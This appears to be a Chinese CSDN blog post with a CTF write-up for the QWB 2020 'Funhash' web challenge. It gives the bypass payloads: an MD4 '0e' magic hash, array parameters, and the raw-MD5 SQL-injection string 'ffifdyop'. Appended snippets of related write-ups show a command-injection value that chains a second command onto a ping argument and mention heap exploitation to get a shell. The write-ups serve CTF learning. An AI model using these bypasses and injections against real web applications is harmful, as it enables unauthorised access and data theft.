强网杯2020部分WP

最新推荐文章于 2024-11-05 18:43:44 发布
最新推荐文章于 2024-11-05 18:43:44 发布
阅读量2.7k 收藏 2
点赞数 5
CC 4.0 BY-SA版权
分类专栏: 赛题复现 文章标签: 强网杯 ctf 网络安全 hash
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zz_Caleb/article/details/108193422
本文详细介绍了一个名为Funhash的挑战,包含三个级别的破解过程。level1利用特定MD4加密后的0e碰撞现象,通过构造特定字符串绕过;level2通过数组形式的参数设置实现绕过;level3则利用特殊字符完成挑战。最终payload整合了各level的绕过策略。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Funhash

在这里插入图片描述
有三个level,一个一个过

level1:

hash函数之后的值等于原值,也就是使用hash进行md4加密之后的密文=明文,比较常见的有0e碰撞相等

给出两个加密之后开头仍是0e的字符串:0e251288019、0e001233333333333334557778889

hash1=0e001233333333333334557778889绕过level1

level2

数组绕过:hash2[]=1&hash3[]=3

level3

特殊字符绕过:hash4=ffifdyop

最终payload:
hash1=0e001233333333333334557778889&hash2[]=1&hash3[]=3&hash4=ffifdyop

强网2020 Blockchain IPFS
lwq787998189的博客
08-24 790
强网2020 Blockchain IPFS 首先观察题干,下载附件后位如下的文本文档。 两张图片分别为pic1.jpg和pic2.jpg。然后pic2给出了文件的sha256sum,pic1被分为6个碎片进行存储,并给了每个碎片的文件哈希。 了解IPFS的人应该知道,IPFS里面文件哈希均以Qm开头。这是因为IPFS采用了MultiHash技术。原理就是在原有哈希值的前面加上sha-256编码(0x12)和32字节的哈希摘要(0x20),并进行base58编码,最终得到Qm开头的哈希地址。因此在本题中
2024强网 Web WP
GKDf1sh
11-04 1811
qwb 2024 QWB 强网 2024 writeup WP 题解 WEB web 发现在text经过了,从而实现绕过黑名单。源码的大概意思是向blockly_json接口Post需要发的Block参数,flask接受到参数后进行黑名单查询,然后进行拼接语句形成代码将代码写入run.py,然后执行run.py,五秒后删除run.py。
2020强网 部分wp
fly夏天的博客
08-26 1793
2020强网 部分wp 彩笔参加了这次强网,感觉又被扎心,果然是得PWN者得天下。 1. BANK 这题虽然是个PWN,但是居然被我这个web小白做出来了,我感觉我这种做法是个非预期解,也不知道大佬是如何操作的。 首先,远程nc连接,提示解密拼接字符串的sha256加密。编写python脚本爆破。简易脚本如下: import hashlib,os s = 'a36MUMAX1VSQQcEHJ' #伪加密部分字符串 result = 'f8a38643f58bf7d6523d8c43f81a9329d
2020强网babynotes题wp
sln_1550的博客
08-27 604
漏洞点1,删除note时索引可以输入负值: 配合下面的数据结构,可以free掉buf_motto和buf_name的指针: 漏洞点2,注册用户时输入name为24个字节时会把age通过strcpy附上,造成offbyone类似的效果: 思路就是先通过删除-1和-2两个note来泄露heap和libc基址,然后通过fastbin攻击修改malloc_hook,realloc_hook来完成getshell 具体exp如下: #coding:utf8 from PwnContext import * #
2020强网部分WP
z4ky的博客
08-25 1641
侧防 IDA打开程序 写脚本逆向即可 str_enc = "Lx|dTUwe\IvNhCBOLqDNfW}ImFZCtiyxO\PW^ebD" str_ = [] for i in range(0,len(str_enc ), 4): str_ .append(str_enc [i+1]) str_ .append(str_enc [i+2]) str_ .append(str_enc [i+3]) str_ .append(str_enc [i]) print
2020第四届强网部分WP
李熠专用博客_白帽子一枚,人称低危终结者
08-24 1430
题目序号 主动 操作内容: 进入址,阅读源码,发现是个命令执行的题。 先尝试ls命令列出所有文件,发现存在flag.php文件,猜测flag在该文件中。 然后尝试读取flag.php文件,但是正则匹配了flag关键词,需要使用通配符绕过,如:fla?.php,但是尝试cat、tail、head、more文件读取命令均无效,最后使用tac命令拿到flag。 flag值: flag{I_like_qwb_web} 题目序号 Funhash 操作内容: 进入址,开始阅读源码,发现需要绕过三个不同的限制方
2024强网Master of OSINT部分wp
最新发布
2401_82808188的博客
11-05 1252
2024强网Master of OSINT部分wp
强网 WriteUp By Nu1L
08-02
强网 WriteUp By Nu1L》是关于2022年第六届“强网”全国网络安全挑战赛的一份技术分析报告,由Nu1L团队撰写。在这篇WriteUp中,作者分享了他们在竞赛中遇到的各种挑战和解决策略,涵盖了Pwn、Reverse、Find_...
强网2021 pwn部分wp
eeeeeight的博客
06-18 1421
baby_diary: 本题考查2.31的off by one, 漏洞处如下: 在sub_146e中会将输入数据的ASCII码相加再相加相加…直到变成一个byte的数字, 然后加到输入数据的后一位上, 因此我们可以尝试控制输入的内容, 从而控制下一个chunk的size大小 在确定完溢出点后, 我们便开始准备伪造chunk了, 由于要满足p->fd->bk == p, p->bk->fd == p以及prevsize == size, 我们需要申请一个largebin的chunk
2021第五届强网部分writewp
zji
06-14 1425
第五届强网部分题解 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录第五届强网部分题解前言一、Web1.1Web1 [强网先锋]寻宝操作过程二、MISC2.读入数据三、PWN 前言 提示:这里不是我一个人打出来的,一个团队,然后可能有些写得不是很清楚,望见谅。 提示:以下是本篇文章正文内容,下面案例可供参考 一、Web 1.1Web1 [强网
强网wp
Sentiment的博客
07-22 1154
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 强网wp PWN PWN no_output 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import nu
强网2020-dice2cry&baby_crt&bank
CTF小白的博客
08-29 1860
Web2 dice2cry 操作内容: 输入token后抓包 发现这边给我们设置了一些cookie 一看就知道这是一个RSA加密的密文,公钥n以及公钥e的值 然后抓包roll骰子那个界面 发现他会随机返回给我们一个数字,大概是0-2样子 这边发现abi.php有一个备份文件abi.php.bak 拿到这个abi.php的一个后台源码 <?php session_start(); header("Content-type:text/html;charset=utf-8"); $data = json
2020强网flower题wp
sln_1550的博客
08-27 597
从apk中解压出libnative.so 拖入IDA,发现加密算法在sub_F34中: 关键部分有花指令,patch后可以直接F5看C源码 整个代码逻辑用python描述如下: 主要操作是对输入的flag字符串前后各用首字节和尾字节填充满128字节,然后加密变化后和固定字符串比较。 根据算法逆写解密程序并执行出结果 ...
2020强网强网先锋之Funhash
Firebasky的博客
09-27 1351
作为小白,也应该去见见世面,于是参加了2020强网 也让自己学到的了不少。下面是自己关于Funhash的解题思路 2020强网强网先锋之Funhash 直接上源代码 <?php include 'conn.php'; highlight_file("index.php"); //level 1 if ($_GET["hash1"] != hash("md4", $_GET["hash1"])) { die('level 1 failed'); } //level 2 if($_GET[.
第二届强网wp
03-29 310
web web签到 利用了md5碰撞 payload为 param1 =%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%6...
强网web部分wp
freerats的博客
08-26 598
主动 ?ip=127.0.0.1|cat ls 使用内联执行 Funhash hash1=0e001233333333333334557778889可绕过 数组绕过 ffifdyop构成万能密钥 ?hash1=0e001233333333333334557778889&hash2[]=1&hash3[]=2&hash4=ffifdyop flag{y0u_w1ll_l1ke_h4sh} web辅助 看到这个熟悉的替换,可以进行序列化字符逃逸 class.php里面的几个函
第四届强网部分wp
weixin_44110537的博客
08-24 388
babycrt 通过分析sign函数中的代码,可以得到以下的等式:(记sign输出的值为ans) ans=S(c1*c2)%pq m+1-c1=Se1%t1…1 m+1-c2=Se2%t2…2 e1d=1%t1-1…5 e2d=1%t2-1…6 ed=1%(p-1)(q-1) Sq=md%qt2 Sp=(m+k)d%pt1 n=pq 通过观察S的生成方法可以知道S是余数为(Sq,Sp) 模数为 (qt2,pt1)的一个共同解(CRT),于是有: md=S%qt2 (m+k)d=S%pt1 即: md=S%q
2020 第四届强网 线上赛Web_Writeup
末初 · mochu7
08-27 2865
赛题类型强网先锋主动uploadFunhashweb辅助WebMisc 强网先锋 主动 首先题目长这样, 很明显是考查命令执行绕过过滤字符 <?php highlight_file("index.php"); if(preg_match("/flag/i", $_GET["ip"])) { die("no flag"); } system("ping -c 3 $_GET[ip]"); ?> 执行多条命令可以使用;分号或者|管道符闭合上一条命令 绕过方法很多,自己上找,这
2022强网WP
CK_0ff的博客
08-08 3170
2022强网WP
强网 2022 谍影重重wp
12-18
强网2022谍影重重WP是我国一项网络安全竞赛中的一个题目解答。这道题目主要涉及隐写和密码学方面的知识,要求选手解析一段加密信息,并还原出明文信息。 解题过程如下: 首先,选手会得到一段看似普通的文本,但...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值